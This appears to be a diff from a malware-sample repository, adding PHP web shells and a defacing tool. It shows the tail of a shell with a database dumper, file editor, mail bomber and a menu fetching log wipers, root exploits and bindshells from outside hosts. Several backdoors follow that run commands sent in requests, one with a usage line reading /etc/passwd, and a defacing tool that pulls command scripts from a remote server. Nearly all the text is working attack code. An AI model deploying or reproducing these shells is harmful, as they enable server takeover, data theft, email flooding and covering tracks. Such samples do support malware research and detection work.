echo("<tr><td><a href='?act=sql&db=" . $_GET['db'] . "&table=" . $row[0] ."'>" . $row[0] . "</a></td><td>[<a href='?act=sql&db=" . $_GET['db'] . "&table=" . $row[0] ."&sqlf=dl'>Download</a>]</td></tr>\n");
}
echo("</table>");
}
}
else{
$dbs=mysql_list_dbs($sqlcon);
while($row = mysql_fetch_object($dbs)) {
echo("<a href='?act=sql&db=" . $row->Database . "'>" . $row->Database . "</a><br>\n");
}
}
mysql_close($sqlcon);
}
function sqldownload(){ // Download sql file function
@ob_flush;
$sqlcon = @mysql_connect($_SESSION['sql_host'] . ':' . $_SESSION['sql_port'], $_SESSION['sql_user'], $_SESSION['sql_password']);
mysql_select_db($_GET['db'], $sqlcon);
$query = "SHOW COLUMNS FROM " . $_GET['table'];
$result = mysql_query($query, $sqlcon) or die(mysql_error());
$fields = array();
while($row = mysql_fetch_assoc($result)){
array_push($fields, $row['Field']);
$i++;
}
$result = mysql_query("Select * FROM " . $_GET['table'], $sqlcon) or die(mysql_error());
$num_rows = mysql_num_rows($result) or die(mysql_error());
for($x=1;$x<$num_rows;$x++){
$out .= "(";
for($i=0;$i<count($fields);$i++){
$out .= "'";
$query = "Select " . $fields[$i] . " FROM " . $_GET['table'] . " Where " . $fields[0] . " = '" . $x . "'";
$dat = mysql_query($query, $sqlcon) or die(mysql_error());
while($row = mysql_fetch_row($dat)){
if($row[0] == ""){
$row[0] = "NULL";
}
if($i != count($fields)-1){
$out .= str_replace("\r\n", "\\r\\n", $row[0]) . "', ";
}
else{
$out .= $row[0]. "'";
}
}
}
$out .= ");\n";
}
$filename = $_GET['table'] . "-" . time() . '.sql';
header("Content-type: application/octet-stream");
header("Content-length: " . strlen($out));
header("Content-disposition: attachment; filename=" . $filename . ";");
echo($out);
die();
}
function sqlinsert(){
style();
$sqlcon = @mysql_connect($_SESSION['sql_host'] . ':' . $_SESSION['sql_port'], $_SESSION['sql_user'], $_SESSION['sql_password']);
mysql_select_db($_GET['db'], $sqlcon);
if($_POST['ins']){
unset($_POST['ins']);
$fields = array_flip($_POST);
$f = implode(",", $fields);
$v = implode(",", $_POST);
$query = "Insert INTO " . $_GET['table'] . " (" . $f . ") VALUES (" . $v . ")";
mysql_query($query, $sqlcon) or die(mysql_error());
die("Row inserted.<br>\n<a href='?act=sql&db=" . $_GET['db'] . "&table=" . $_GET['table'] . "'>Go back</a>");
}
$query = "SHOW COLUMNS FROM " . $_GET['table'];
$result = mysql_query($query, $sqlcon) or die(mysql_error());
$i = 0;
$fields = array();
echo("<form method='POST'>");
echo("<table>");
while($row = mysql_fetch_assoc($result)){
array_push($fields, $row['Field']);
echo("<tr><td><b>" . $fields[$i] . "</b><td><input type='text' name='" . $fields[$i] . "'><br>\n");
$i++;
}
echo("</table>");
echo("<br>\n<input type='submit' value='Insert' name='ins'>");
echo("</form>");
}
function nicesize($size){
if(!$size){return false;}
if ($size >= 1073741824){return(round($size / 1073741824) . " GB");}
elseif ($size >= 1048576){return(round($size / 1048576) . " MB");}
elseif ($size >= 1024){return(round($size / 1024) . " KB");}
else{return($size . " B");}
}
function files($dir){ // File manipulator function
style();
global $self, $curdir;
if($dir==""){$dir = $curdir;}
$dirx = explode("/", $dir);
$files = array();
$folders = array();
echo("<form method='GET'>");
echo("<input type='text' name='dir' value='" . $dir . "' size='40'>");
echo("<input type='submit' value='Go'>");
echo("</form>");
echo("<h4>File list for ");
for($i=0;$i<count($dirx);$i++){
$totalpath .= $dirx[$i] . "/";
echo("<a href='?dir=" . $totalpath . "'>$dirx[$i]</a>" . "/");
}
echo("</h4>");
echo("<table>");
echo("<th>File Name<th>File Size</th>");
if ($handle = opendir($dir)) {
while (false != ($link = readdir($handle))) {
if (is_dir($dir . '/' . $link)){
$file = array();
if(is_writable($dir . '/' . $link)){$file['perm']='write';}
elseif(is_readable($dir . '/' . $link)){$file['perm']='read';}
else{$file['perm']='none';}
switch($file['perm']){
case "write": @$file['link'] = "<a href='?dir=$dir/$link'><font color='green'>$link</font></a>"; break;
case "read": @$file['link'] = "<a href='?dir=$dir/$link'><font color='yellow'>$link</font></a>"; break;
case "none": @$file['link'] = "<a href='?dir=$dir/$link'><font color='red'>$link</font></a>"; break;
default: @$file['link'] = "<a href='?dir=$dir/$link'><font color='red'>$link</font></a>"; break;
}
@$file['icon'] = "folder";
if($_SERVER['QUERY_STRING']){$folder = "<img src='?" . $_SERVER['QUERY_STRING'] . "&img=" . $file['icon']. "'> " . $file['link'];}
else{$folder = "<img src='?img=" . $file['icon']. "'> " . $file['link'];}
array_push($folders, $folder);
}
else{
$file = array();
$ext = strtolower(end(explode(".", $link)));
if(!$file['size'] = nicesize(@filesize($dir . '/' . $link))){
$file['size'] = "0B";
}
if(is_writable($dir . '/' . $link)){$file['perm']='write';}
elseif(is_readable($dir . '/' . $link)){$file['perm']='read';}
else{$file['perm']='none';}
switch($file['perm']){
case "write": @$file['link'] = "<a href='?act=view&f=" . $link . "&dir=$dir'><font color='green'>$link</font></a>"; break;
case "read": @$file['link'] = "<a href='?act=view&f=" . $link . "&dir=$dir'><font color='yellow'>$link</font></a>"; break;
case "none": @$file['link'] = "<a href='?act=view&f=" . $link . "&dir=$dir'><font color='red'>$link</font></a>"; break;
default: @$file['link'] = "<a href='?act=view&f=" . $link . "&dir=$dir'><font color='red'>$link</a></font>"; break;
}
switch($ext){
case "exe": case "com": case "jar": case "": $file['icon']="binary"; break;
case "jpg": case "gif": case "png": case "bmp": $file['icon']="image"; break;
case "zip": case "tar": case "rar": case "gz": case "cab": case "bz2": case "gzip": $file['icon']="compressed"; break;
case "txt": case "doc": case "pdf": case "htm": case "html": case "rtf": $file['icon']="text"; break;
case "wav": case "mp3": case "mp4": case "wma": $file['icon']="sound"; break;
case "js": case "vbs": case "c": case "h": case "sh": case "pl": case "py": case "php": case "h": $file['icon']="script"; break;
default: $file['icon'] = "unknown"; break;
}
if($_SERVER['QUERY_STRING']){$file = "<tr><td><img src='?" . $_SERVER['QUERY_STRING'] . "&img=" . $file['icon']. "' height='18' width='18'> " . $file['link'] . "</td><td>" . $file['size'] . "</td></tr>\n";}
else{$file = "<tr><td><img src='?img=" . $file['icon']. "' height='18' width='18'> " . $file['link'] . "<td>" . $file['size'] . "</td></tr>\n";}
array_push($files, $file);
}
}
foreach($folders as $folder){echo("<tr><td>$folder</td><td>DIR</td></tr>\n");}
foreach($files as $file){echo($file);}
echo("</table>");
closedir($handle);
}
}
function email(){ // Email bomber function
$times = $_POST['times'];
$to = $_POST['to'];
$subject = $_POST['subject'];
$body = $_POST['body'];
$from = $_POST['from'];
style();
echo("<h2>Mail Bomber</h2>
<form method='POST' action='?act=email'>
<b>Your address:</b><br>
<input name='from' type='text' size='35'><br>
<b>Their address:</b><br>
<input name='to' type='text' size='35'><br>
<b>Subject:</b><br>
<input name='subject' type='text' size='35'><br>
<b>Text:</b><br>
<input name='body' type='text' size='35'><br>
<b>How many times:</b><br>
<input name='times' type='text' size='5'><br><br>
<input name='submit' type='submit' value='Submit'>
</form>");
if ($to && $from){for($i=0;$i<$times;$i++){mail("$to", "$subject", "$body", "From: $from");}}
}
function view($filename, $dir){ // File view function
if($_POST['fileact'] == "Download"){
header("Content-type: application/octet-stream");
header("Content-length: ".strlen($_POST['contents']));
header("Content-disposition: attachment; filename=" . basename($filename) . ";");
$handle = fopen($filename, "r");
echo(fread($handle, filesize($filename)));
die();
}
style();
if($_POST['contents'] && $_POST['fileact'] == "Save"){
$handle = fopen($filename, 'w');
fwrite($handle, stripslashes($_POST['contents']));
fclose($handle);
echo("Saved file.<br><br>");
echo("<a href='?act=view&f=$filename&dir=nullz'>Go back</a>");
die();
}
elseif($_POST['fileact'] == "Delete"){
unlink($filename);
echo("Deleted file.<br><br>");
echo("<a href='?act=files'>Go back</a>");
die();
}
if($dir != "nullz"){ // heh
$filename = $dir."/".$filename;
}
$bad = array("<", ">");
$good = array("<", ">");
$file = fopen($filename, 'r');
$content = fread($file, @filesize($filename));
echo("<form name='file' method='POST' action='?act=view&dir=$dir&f=$filename'>");
echo("<textarea style='width:100%; height:92%;' name='contents'>");
echo(str_replace($bad, $good, $content)."\n");
echo("</textarea>");
echo("<input name='fileact' type='submit' value='Save'>");
echo("<input name='fileact' type='submit' value='Delete'>");
echo("<input name='fileact' type='submit' value='Download'>");
echo("</form>");
}
function edit($file, $contents){ // File edit function
style();
$handle = fopen($file, 'w');
fwrite($handle, $contents);
fclose($handle);
echo("Saved file.<br><br>");
echo("<a href='?act=files'>Go back</a>");
}
function upload(){ // Uploading frontend function
global $curdir;
style();
echo("<form name='files' enctype='multipart/form-data' method='POST'>
<b>Output Directory</b><br>
<input type='text' name='loc' size='65' value='" . $curdir . "'><br><br>
<b>Remote Upload</b><br>
<input type='text' name='rem' size='65'>
<input type='submit' value='Grab'><br><br>
<b>Local File Upload</b><br>
<input name='up' type='file' size='65'>
<input type='submit' value='Upload'>
</form><br>");
if($_POST['rem']){grab($_POST['rem']);}
if($_FILES['up']){up($_FILES['up']);}
}
function up($up){ // Uploading backend function
style();
$updir = $_POST['loc'];
move_uploaded_file($up["tmp_name"], $updir . "/" . $up["name"]);
die("File has been uploaded.");
}
function grab($file){ // Uploading backend function
style();
$updir = $_POST['loc'];
$filex = array_pop(explode("/", $file));
if(exec("wget $file -b -O $updir/$filex")){die("File has been uploaded.");}
else{die("File upload failed.");}
}
function tools(){ // Useful tools function
global $curdir;
style();
$tools = array(
"--- Log wipers ---"=>"1",
"Vanish2.tgz"=>"http://packetstormsecurity.org/UNIX/penetration/log-wipers/vanish2.tgz",
"Cloak.c"=>"http://packetstormsecurity.org/UNIX/penetration/log-wipers/cloak.c",
"gh0st.sh"=>"http://packetstormsecurity.org/UNIX/penetration/log-wipers/gh0st.sh",
"--- Priv Escalation ---"=>"2",
"h00lyshit - Linux 2.6 ALL"=>"http://someshit.net/files/xpl/h00lyshit",
"k-rad3 - Linux <= 2.6.11"=>"http://someshit.net/files/xpl/krad3",
"raptor - Linux <= 2.6.17.4"=>"http://someshit.net/files/xpl/raptor",
"rootbsd - BSD v?"=>"http://someshit.net/files/xpl/rootbsd",
"--- Bindshells ---"=>"3",
"THC rwwwshell-1.6.perl"=>"http://packetstormsecurity.org/groups/thc/rwwwshell-1.6.perl",
"Basic Perl bindshell"=>"http://packetstormsecurity.org/groups/synnergy/bindshell-unix",
"--- Misc ---"=>"4",
"MOCKS SOCKS4 Proxy"=>"http://superb-east.dl.sourceforge.net/sourceforge/mocks/mocks-0.0.2.tar.gz",
"xps.c (proc hider)"=>"http://packetstormsecurity.org/groups/shadowpenguin/unix-tools/xps.c");
$names = array_flip($tools);
echo("<b>Tools:</b>");
echo("<form method='post'>");
echo("<b>Output Directory</b><br>");
echo("<input type='text' name='loc' size='65' value='" . $curdir . "'><br><br>");
echo("<select name='gf' style='align:center;'>");
foreach($tools as $tool) {echo("<option value='" . $tool . "'>" . $names[$tool] . "</option>\n");}
echo("</select>");
echo("<br><input type='submit' value='Grab'>");
echo("</form>");
}
function lookup(){ // Domain lookup function
style();
global $servinf;
$script = "import urllib, urllib2, sys, re
req = urllib2.Request('http://www.seologs.com/ip-domains.html', urllib.urlencode({'domainname' : sys.argv[1]}))
site = re.findall('.+\) (.+)<br>', urllib2.urlopen(req).read())
for i in xrange(0,len(site)):
print site[i]"; // My sexy python script
$handle = fopen('lookup.py', 'w');
fwrite($handle, $script);
fclose($handle);
echo("<h4>Domains</h4>");
echo("<ul>");
$cmd = exec("python lookup.py " . $servinf[0], $ret);
foreach($ret as $site){echo("<li>" . $site . "\n");}
unlink('lookup.py');
}
function img($img){ // Images function
$images = array(
"folder"=>"R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEAAA" .
"gALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp/4YchffzGQhH4YRYPB2DOlHPiKwq" .
"d1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=",
"image"=>"R0lGODlhFAAWAOMAAP////8zM8z//8zMzJmZmWZmZmYAADMzMwCZzACZMwAzZgAAAAAAAAAAAAAAAAAAACH+TlRoaX" .
"MgYXJ0IGlzIGluIHRoZSBwdWJsaWMgZG9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1i" .
"ZXIgMTk5NQAh+QQBAAACACwAAAAAFAAWAAAEkPDISae4WBzAu99Hdm1eSYYZWXYqOgJBLAcDoNrYNssGsBy/4GsX6y" .
"2OyMWQ2OMQngSlBjZLWBM1AFSqkyU4A2tWywUMYt/wlTSIvgYGA/Zq3QwU7mmHvh4g8GUsfAUHCH95NwMHV4SGh4Ed" .
"ihOOjy8rZpSVeiV+mYCWHncKo6Sfm5cliAdQrK1PQBlJsrNSEQA7",
"unknown"=>"R0lGODlhFAAWAMIAAP///8z//5mZmTMzMwAAAAAAAAAAAAAAACH+TlRoaXMgYXJ0IGlzIGluIHRoZSBwdWJsaWMgZG" .
"9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1iZXIgMTk5NQAh+QQBAAABACwAAAAAFAAW" .
"AAADaDi6vPEwDECrnSO+aTvPEQcIAmGaIrhR5XmKgMq1LkoMN7ECrjDWp52r0iPpJJ0KjUAq7SxLE+sI+9V8vycFiM" .
"0iLb2O80s8JcfVJJTaGYrZYPNby5Ov6WolPD+XDJqAgSQ4EUCGQQEJADs=",
"binary"=>"R0lGODlhFAAWAMIAAP///8z//8zMzJmZmTMzMwAAAAAAAAAAACH+TlRoaXMgYXJ0IGlzIGluIHRoZSBwdWJsaWMgZG" .
"9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1iZXIgMTk5NQAh+QQBAAABACwAAAAAFAAW" .
"AAADaUi6vPEwEECrnSS+WQoQXSEAE6lxXgeopQmha+q1rhTfakHo/HaDnVFo6LMYKYPkoOADim4VJdOWkx2XvirUgq" .
"VaVcbuxCn0hKe04znrIV/ROOvaG3+z63OYO6/uiwlKgYJJOxFDh4hTCQA7",
"text"=>"R0lGODlhFAAWAOMAAP/////MM/8zM8z//5mZmZlmM2bM/zMzMwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH+TlRoaX" .
"MgYXJ0IGlzIGluIHRoZSBwdWJsaWMgZG9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1i" .
"ZXIgMTk5NQAh+QQBAAADACwAAAAAFAAWAAAEb/DISee4eBzAu99Hdm1eSYbZWXEkgI5sEBg0+2HnTBsccvhAmGtXAy" .
"COSITwUGg2PYQoQalhOZ/QKLVV6gKmQm8XXDUmzx0yV5ze9s7JdpgtL3ME5jhHTS/xO3hwdWt0f317WwdSi4xRPxlw" .
"kUgXEQA7",
"compressed"=>"R0lGODlhFAAWAOcAAP//////zP//mf//Zv//M///AP/M///MzP/Mmf/MZv/MM//MAP+Z//+ZzP+Zmf+ZZv+ZM/+ZAP" .
"9m//9mzP9mmf9mZv9mM/9mAP8z//8zzP8zmf8zZv8zM/8zAP8A//8AzP8Amf8AZv8AM/8AAMz//8z/zMz/mcz/Zsz/" .
"M8z/AMzM/8zMzMzMmczMZszMM8zMAMyZ/8yZzMyZmcyZZsyZM8yZAMxm/8xmzMxmmcxmZsxmM8xmAMwz/8wzzMwzmc" .
"wzZswzM8wzAMwA/8wAzMwAmcwAZswAM8wAAJn//5n/zJn/mZn/Zpn/M5n/AJnM/5nMzJnMmZnMZpnMM5nMAJmZ/5mZ" .
"zJmZmZmZZpmZM5mZAJlm/5lmzJlmmZlmZplmM5lmAJkz/5kzzJkzmZkzZpkzM5kzAJkA/5kAzJkAmZkAZpkAM5kAAG" .
"b//2b/zGb/mWb/Zmb/M2b/AGbM/2bMzGbMmWbMZmbMM2bMAGaZ/2aZzGaZmWaZZmaZM2aZAGZm/2ZmzGZmmWZmZmZm" .
"M2ZmAGYz/2YzzGYzmWYzZmYzM2YzAGYA/2YAzGYAmWYAZmYAM2YAADP//zP/zDP/mTP/ZjP/MzP/ADPM/zPMzDPMmT" .
"PMZjPMMzPMADOZ/zOZzDOZmTOZZjOZMzOZADNm/zNmzDNmmTNmZjNmMzNmADMz/zMzzDMzmTMzZjMzMzMzADMA/zMA" .
"zDMAmTMAZjMAMzMAAAD//wD/zAD/mQD/ZgD/MwD/AADM/wDMzADMmQDMZgDMMwDMAACZ/wCZzACZmQCZZgCZMwCZAA" .
"Bm/wBmzABmmQBmZgBmMwBmAAAz/wAzzAAzmQAzZgAzMwAzAAAA/wAAzAAAmQAAZgAAM+4AAN0AALsAAKoAAIgAAHcA" .
"AFUAAEQAACIAABEAAADuAADdAAC7AACqAACIAAB3AABVAABEAAAiAAARAAAA7gAA3QAAuwAAqgAAiAAAdwAAVQAARA" .
"AAIgAAEe7u7t3d3bu7u6qqqoiIiHd3d1VVVURERCIiIhEREQAAACH+TlRoaXMgYXJ0IGlzIGluIHRoZSBwdWJsaWMg" .
"ZG9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1iZXIgMTk5NQAh+QQBAAAkACwAAAAAFA" .
"AWAAAImQBJCCTBqmDBgQgTDmQFAABDVgojEmzI0KHEhBUrWrwoMGNDihwnAvjHiqRJjhX/qVz5D+VHAFZiWmmZ8BGH" .
"ji9hxqTJ4ZFAmzc1vpxJgkPPn0Y5CP04M6lPEkCN5mxoJelRqFY5TM36NGrPqV67Op0KM6rYnkup/gMq1mdamC1tdn" .
"36lijUpwjr0pSoFyUrmTJLhiTBkqXCgAA7",
"sound"=>"R0lGODlhFAAWAMIAAP////8zM8z//8zMzJmZmWYAADMzMwAAACH+TlRoaXMgYXJ0IGlzIGluIHRoZSBwdWJsaWMgZG" .
"9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1iZXIgMTk5NQAh+QQBAAACACwAAAAAFAAW" .
"AAADayi63P4wNsNCkOocYVWPB7FxFwmFwGh+DZpynndpNAHcW9cVQUj8tttrd+G5hMINT7A0BpE4ZnF6hCqn0iryKs" .
"0SDN9v0tSc0Q4DQ1SHFRjeBrQ6FzNN5Co2JD4YfUp7GnYsexQLhBiJigsJADs=",
"script"=>"R0lGODlhFAAWAMIAAP///8z//5mZmTMzMwAAAAAAAAAAAAAAACH+TlRoaXMgYXJ0IGlzIGluIHRoZSBwdWJsaWMgZG" .
"9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1iZXIgMTk5NQAh+QQBAAABACwAAAAAFAAW" .
"AAADZTi6vPEwDECrnSO+aTvPEddVIrhVBJCSF8QRMIwOBE2fVLrmcYz3O4pgKCDgVMgR0SgZOYVM0dNS/AF7gGy1me" .
"16v9vXNdYNf89es2os00bRcDW7DVDDwe87fjMg+v9DNxBzYw8JADs=");
header('Content-type: image/gif');
echo base64_decode($images[$img]);
die();
}
function kill(){ // Shell deleter function
style();
echo("<form method='post'>");
echo("Type 'confirm' to kill the shell:<br>\n<input type='text' name='ver' action='?act=kill'>");
echo("<input type='submit' value='Delete'>");
echo("</form>");
if($_POST['ver'] == "confirm"){
$self = basename($_SERVER['PHP_SELF']);
if(unlink($self)){echo("Deleted");}
else{echo("Failed");}
}
}
die();
?>

18
PHP/Backdoor.PHP.WebShell.y Normal file
View File

@ -0,0 +1,18 @@
<html>
<head>
<title>G-Security Webshell</title>
</head>
<body bgcolor=#000000 text=#ffffff ">
<form method=POST>
<br>
<input type=TEXT name="-cmd" size=64 value="<?=$cmd?>"
style="background:#000000;color:#ffffff;">
<hr>
<pre>
<? $cmd = $_REQUEST["-cmd"];?>
<? if($cmd != "") print Shell_Exec($cmd);?>
</pre>
</form>
</body>
</html

17
PHP/Backdoor.PHP.WebShell.z Normal file
View File

@ -0,0 +1,17 @@
<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->
<?php
if(isset($_REQUEST['cmd'])){
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "</pre>";
die;
}
?>
Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
<!-- http://michaeldaw.org 2006 -->

71
PHP/Backdoor.PHP.Zonie Normal file
View File

@ -0,0 +1,71 @@
<?
// a simple php backdoor | coded by z0mbie [30.08.03] | http://freenet.am/~zombie \\
ob_implicit_flush();
if(isset($_REQUEST['f'])){
$filename=$_REQUEST['f'];
$file=fopen("$filename","rb");
fpassthru($file);
die;
}
if(isset($_REQUEST['d'])){
$d=$_REQUEST['d'];
echo "<pre>";
if ($handle = opendir("$d")) {
echo "<h2>listing of $d</h2>";
while ($dir = readdir($handle)){
if (is_dir("$d/$dir")) echo "<a href='$PHP_SELF?d=$d/$dir'><font color=grey>";
else echo "<a href='$PHP_SELF?f=$d/$dir'><font color=black>";
echo "$dir\n";
echo "</font></a>";
}
} else echo "opendir() failed";
closedir($handle);
die ("<hr>");
}
if(isset($_REQUEST['c'])){
echo "<pre>";
system($_REQUEST['c']);
die;
}
if(isset($_REQUEST['upload'])){
if(!isset($_REQUEST['dir'])) die('hey,specify directory!');
else $dir=$_REQUEST['dir'];
$fname=$HTTP_POST_FILES['file_name']['name'];
if(!move_uploaded_file($HTTP_POST_FILES['file_name']['tmp_name'], $dir.$fname))
die('file uploading error.');
}
if(isset($_REQUEST['mquery'])){
$host=$_REQUEST['host'];
$usr=$_REQUEST['usr'];
$passwd=$_REQUEST['passwd'];
$db=$_REQUEST['db'];
$mquery=$_REQUEST['mquery'];
mysql_connect("$host", "$usr", "$passwd") or
die("Could not connect: " . mysql_error());
mysql_select_db("$db");
$result = mysql_query("$mquery");
if($result!=FALSE) echo "<pre><h2>query was executed correctly</h2>\n";
while ($row = mysql_fetch_array($result,MYSQL_ASSOC)) print_r($row);
mysql_free_result($result);
die;
}
?>
<pre><form action="<? echo $PHP_SELF; ?>" METHOD=GET >execute command: <input type="text" name="c"><input type="submit" value="go"><hr></form>
<form enctype="multipart/form-data" action="<?php echo $PHP_SELF; ?>" method="post"><input type="hidden" name="MAX_FILE_SIZE" value="1000000000">
upload file:<input name="file_name" type="file"> to dir: <input type="text" name="dir">&nbsp;&nbsp;<input type="submit" name="upload" value="upload"></form>
<hr>to browse go to http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=[directory here]
<br>for example:
http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=/etc on *nix
or http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=c:/windows on win
<hr>execute mysql query:
<form action="<? echo $PHP_SELF; ?>" METHOD=GET >
host:<input type="text" name="host"value="localhost"> user: <input type="text" name="usr" value=root> password: <input type="text" name="passwd">
database: <input type="text" name="db"> query: <input type="text" name="mquery"> <input type="submit" value="execute">
</form>
<!-- http://michaeldaw.org 2006 -->

BIN
PHP/Cythosia.7z Normal file
View File

Binary file not shown.

164
PHP/Exploit.PHP.Deftool.a Normal file
View File

@ -0,0 +1,164 @@
<!--
Defacing Tool 1.8 by r3v3ng4ns
revengans@hotmail.com
codigo reescrito
-->
<?php
@closelog();
@error_reporting(0);
$vers="1.8 priv8";
$remote_addr="http://www.cmjn.ce.gov.br/yc/";
$format_addr=".txt";
$cmd_addr=$remote_addr."pro18".$format_addr;
$safe_addr=$remote_addr."safe17".$format_addr;
$writer_addr=$remote_addr."writer17".$format_addr;
$phpget_addr=$remote_addr."get17".$format_addr;
$feditor_addr=$remote_addr."filed".$format_addr;
$put_addr=$remote_addr."filed_put".$format_addr;
$total_addr="http://".$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'];
if(empty($chdir)) $chdir = $_REQUEST['chdir'];
if(empty($cmd)) $cmd = $_REQUEST['cmd'];
if(empty($fu)) $fu = $_REQUEST['fu'];
if(empty($list)) $list = $_REQUEST['list'];
if(empty($qualMet)) $qualMet = $_REQUEST['qualMet'];
if(empty($chdir) or $chdir=='') $chdir=getcwd();
$cmd = stripslashes(trim($cmd));
//CHDIR tool
if (strpos($cmd, 'chdir')!==false and strpos($cmd, 'chdir')=='0'){
$boom = explode(" ",$cmd,2);
$boom2 = explode(";",$boom['1'], 2);
$toDir = $boom2['0'];
if($boom['1']=="/")$chdir="";
else if(strpos($cmd, 'chdir ..')!==false){
$cadaDir = array_reverse(explode("/",$chdir));
if($cadaDir['0']=="" or $cadaDir['0'] ==" ") $lastDir = $cadaDir['1']."/";
else{ $lastDir = $cadaDir['0']."/"; $chdir = $chdir."/";}
$toDir = str_replace($lastDir,"",$chdir);
if($toDir=="/")$chdir="";
} else if(strpos($cmd, 'chdir .')!==false) $toDir = getcwd();
if(strrpos($toDir,"/")==(strlen($toDir)-1)) $toDir=substr($toDir,0,strrpos($toDir,"/"));
if(@opendir($toDir)!==false or @is_dir($toDir)) $chdir=$toDir;
else if(@opendir($chdir."/".$toDir)!==false or @is_dir($chdir."/".$toDir)) $chdir=$chdir."/".$toDir;
else $ch_msg="dtool: line 1: chdir: $toDir: No such directory.\n";
if($boom2['1']==null) $cmd = trim($boom['2']); else $cmd = trim($boom2['1'].$boom2['2']);
if(strpos($chdir, '//')!==false) $chdir = str_replace('//', '/', $chdir);
}
if(!@opendir($chdir)) $ch_msg="dtool: line 1: chdir: It seems that the permission have been denied in dir '$chdir'. Anyway, you can try to send a command here now. If you haven't accessed it, try to use 'cd' instead.\n";
$cmdShow = $cmd;
//To keep the changes in the url, when using the 'GET' way to send php variables
if(empty($post)){
if($chdir==getcwd() or empty($chdir) or $chdir=="")$showdir="";else $showdir="+'chdir=$chdir&'";
if($fu=="" or $fu=="0" or empty($fu))$showfu="";else $showfu="+'fu=$fu&'";
if($list=="" or $list=="0" or empty($list)){$showfl="";$fl="on";}else{$showfl="+'list=1&'"; $fl="off";}
}
//INFO table (pro and normal)
if (@file_exists("/usr/X11R6/bin/xterm")) $pro1="<i>xterm</i> at /usr/X11R6/bin/xterm, ";
if (@file_exists("/usr/bin/nc")) $pro2="<i>nc</i> at /usr/bin/nc, ";
if (@file_exists("/usr/bin/wget")) $pro3="<i>wget</i> at /usr/bin/wget, ";
if (@file_exists("/usr/bin/lynx")) $pro4="<i>lynx</i> at /usr/bin/lynx, ";
if (@file_exists("/usr/bin/gcc")) $pro5="<i>gcc</i> at /usr/bin/gcc, ";
if (@file_exists("/usr/bin/cc")) $pro6="<i>cc</i> at /usr/bin/cc ";
$pro=$pro1.$pro2.$pro3.$pro4.$pro5.$pro6;
$login=@posix_getuid(); $euid=@posix_geteuid(); $gid=@posix_getgid();
$ip=@gethostbyname($_SERVER['HTTP_HOST']);
//Turns the 'ls' command more usefull, showing it as it looks in the shell
if(strpos($cmd, 'ls --') !==false) $cmd = str_replace('ls --', 'ls -F --', $cmd);
else if(strpos($cmd, 'ls -') !==false) $cmd = str_replace('ls -', 'ls -F', $cmd);
else if(strpos($cmd, ';ls') !==false) $cmd = str_replace(';ls', ';ls -F', $cmd);
else if(strpos($cmd, '; ls') !==false) $cmd = str_replace('; ls', ';ls -F', $cmd);
else if($cmd=='ls') $cmd = "ls -F";
//If there are some '//' in the cmd, its now removed
if(strpos($chdir, '//')!==false) $chdir = str_replace('//', '/', $chdir);
?>
<body onload="cmdField.focus();cmdField.select();">
<style>.campo{font-family: Verdana; color:white;font-size:11px;background-color:#414978;height:23px}
.infop{font-family: verdana; font-size: 10px; color:#000000;}
.infod{font-family: verdana; font-size: 10px; color:#414978;}
.algod{font-family: verdana; font-size: 12px; font-weight: bold; color: #414978;}
.titulod{font:Verdana; color:#414978; font-size:20px;}</style>
<script>
function inclVar(){var addr = location.href.substring(0,location.href.indexOf('?')+1);var stri = location.href.substring(addr.length,location.href.length+1);inclvar = stri.substring(0,stri.indexOf('='));}
function enviaCMD(){inclVar();window.document.location.href='<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$cmd_addr;?>'+'?&'<?=$showdir.$showfu.$showfl;?>+'cmd='+cmdField.value;return false;}
function ativaFe(qual){inclVar();window.document.location.href='<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$cmd_addr;?>'+'?&'<?=$showdir.$showfl;?>+'fu='+qual+'&cmd='+cmdField.value;return false;}
function PHPget(){inclVar();var c=prompt("[ PHPget ] by r3v3ng4ns\nDigite a ORIGEM do arquivo (url) com ate 7Mb\n-Utilize caminho completo\n-Se for remoto, use http:// ou ftp://:","http://www.fineca.net/music/");var dir = c.substring(0,c.lastIndexOf('/')+1);var file = c.substring(dir.length,c.length+1);var p=prompt("[ PHPget ] by r3v3ng4ns\nDigite o DESTINO do arquivo\n-Utilize caminho completo\n-O diretorio de destino deve ser writable","<?=$chdir;?>/"+file);window.open('<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$phpget_addr;?>'+'?&'+'inclvar='+inclvar+'&'<?=$showdir;?>+'c='+c+'&p='+p);}
function PHPwriter(){inclVar();var url=prompt("[ PHPwriter ] by r3v3ng4ns\nDigite a URL do frame","http://www.geocities.com/revensite/index.htm");var dir = url.substring(0,url.lastIndexOf('/')+1);var file = url.substring(dir.length,url.length+1);var f=prompt("[ PHPwriter ] by r3v3ng4ns\nDigite o Nome do arquivo a ser criado\n-Utilize caminho completo\n-O diretorio de destino deve ser writable","<?=$chdir;?>/"+file); t=prompt("[ PHPwriter ] by r3v3ng4ns\nDigite o Title da pagina","[ r00ted team ] owned you :P");window.open('<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$writer_addr;?>'+'?&'+'inclvar='+inclvar+'&'<?=$showdir;?>+'url='+url+'&f='+f+'&t='+t);}
